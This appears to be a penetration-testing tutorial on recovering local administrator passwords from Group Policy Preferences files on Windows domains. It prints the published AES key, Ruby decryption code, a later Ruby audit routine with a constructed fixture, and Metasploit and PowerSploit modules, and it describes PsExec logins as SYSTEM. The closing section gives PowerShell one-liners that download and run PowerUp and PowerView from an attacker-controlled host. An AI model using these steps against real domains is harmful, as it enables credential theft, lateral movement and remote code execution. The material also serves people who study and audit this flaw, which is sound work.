Group Policy Preferences allows domain admins to create and deploy local users and local administrator accounts across the domain. This feature was introduced in Windows Server 2008; however, it can be abused by an attacker, since the credentials of these accounts are stored encrypted with a static AES key that Microsoft has published. This leaves the door open for any domain user to retrieve these files and decrypt the stored passwords in order to elevate access.
These files are stored in a shared directory on the domain controller, and any authenticated user in the domain has read access to them, since this is needed in order to obtain group policy updates.
The static key which can decrypt passwords stored in Group Policy Preferences can be seen below:

4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b

Manual Exploitation

In order to exploit this issue manually it is necessary to browse to the Groups.xml file, which is stored in a shared directory on the domain controller, and obtain the value of the attribute cpassword.
GPP cpassword Value
Then this value can be passed into another tool which can decrypt the value.
Decrypting GPP Passwords Manually
Chris Gates wrote a Ruby script for decrypting cpassword values.
require 'openssl'
require 'base64'

encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"

def decrypt(encrypted_data)
  # cpassword values are stored without Base64 padding; restore it
  padding = "=" * ((4 - (encrypted_data.length % 4)) % 4)
  epassword = "#{encrypted_data}#{padding}"
  decoded = Base64.decode64(epassword)
  # Static AES-256 key published by Microsoft
  key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8" \
        "\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
  aes = OpenSSL::Cipher.new("AES-256-CBC")
  aes.decrypt
  aes.key = key
  aes.iv = "\x00" * 16 # GPP uses an all-zero IV
  plaintext = aes.update(decoded)
  plaintext << aes.final
  pass = plaintext.unpack('v*').pack('C*') # UNICODE (UTF-16LE) conversion
  return pass
end

blah = decrypt(encrypted_data)
puts blah

Metasploit

Decrypting passwords that are stored in the Group Policy Preferences can be done automatically through Metasploit. The following post exploitation module will obtain and decrypt the cPassword from the Groups.xml file which is stored in the SYSVOL.
post/windows/gather/credentials/gpp

Metasploit Decrypting GPP Passwords
Since domain administrators can set up local administrator accounts through Group Policy, this can lead to privilege escalation. These credentials can be used with the PsExec Metasploit module in order to successfully log in to the workstation as SYSTEM.
Metasploit PsExec Usage
PsExec Authentication as Administrator
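The manual steps above (locating the cpassword attribute in Groups.xml and decrypting it with the published key) as one self-contained Ruby audit routine, added here as an example and not part of the original post or of Chris Gates' script. It parses a constructed Groups.xml fixture rather than a real SYSVOL file and reports every Properties element carrying a cpassword (the same attribute is used by Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml); the gpp_encrypt helper exists only to build that fixture.

```ruby
require 'openssl'
require 'base64'
require 'rexml/document'

# AES-256 key that Microsoft documents for Group Policy Preferences (the one quoted above).
GPP_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')
ZERO_IV = "\x00" * 16

# Decrypts a cpassword attribute value back to the plaintext password.
def gpp_decrypt(cpassword)
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4) # restore stripped Base64 padding
  aes = OpenSSL::Cipher.new('AES-256-CBC')
  aes.decrypt
  aes.key = GPP_KEY
  aes.iv = ZERO_IV
  utf16 = aes.update(Base64.strict_decode64(padded)) + aes.final
  utf16.force_encoding('UTF-16LE').encode('UTF-8')
end

# Inverse operation; used here only to build the constructed fixture below.
def gpp_encrypt(password)
  aes = OpenSSL::Cipher.new('AES-256-CBC')
  aes.encrypt
  aes.key = GPP_KEY
  aes.iv = ZERO_IV
  utf16 = password.encode('UTF-16LE').force_encoding('BINARY')
  Base64.strict_encode64(aes.update(utf16) + aes.final).delete('=')
end

# Finds every Properties element carrying a cpassword in a GPP XML document and
# reports the parent element type, the account it belongs to and the plaintext.
def audit_gpp_xml(xml)
  doc = REXML::Document.new(xml)
  REXML::XPath.match(doc, '//Properties[@cpassword]').map do |props|
    a = props.attributes
    { element: props.parent.name,
      account: a['userName'] || a['accountName'] || a['runAs'] || a['username'],
      password: gpp_decrypt(a['cpassword']) }
  end
end

# Constructed Groups.xml fixture (not captured from a real domain).
SAMPLE_GROUPS_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <Groups>
    <User name="LocalAdmin">
      <Properties action="U" userName="LocalAdmin" cpassword="#{gpp_encrypt('Summer2014!')}"/>
    </User>
  </Groups>
XML
```

Running audit_gpp_xml over each XML file under the Policies share of SYSVOL gives a quick inventory of every GPP-stored credential that still needs to be removed.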
PowerSploit

Alternatively the same results can be achieved through PowerSploit. There are two modules which can obtain and decrypt the cPassword from the Groups.xml file, either locally or directly from the domain controller.
Get-CachedGPPPassword //For locally stored GP Files
Get-GPPPassword //For GP Files stored in the DC

PowerSploit Get-CachedGPPPassword
PowerShell via Metasploit

As there are many PowerShell scripts that can be used for post exploitation, it is possible to use Metasploit in order to inject a PowerShell payload into a specific process. This allows the execution of PowerShell scripts directly from memory.
Injecting PowerShell Payload into a Process
Then from the interactive PowerShell session the Invoke-Expression cmdlet could be utilized in order to drop and execute any PowerShell script that is locally hosted.
IEX(New-Object Net.WebClient).DownloadString("http://192.168.100.3/tmp/PowerUp.ps1")
IEX(New-Object Net.WebClient).DownloadString("http://192.168.100.3/tmp/PowerView.ps1")

Executing PowerSploit Modules via Metasploit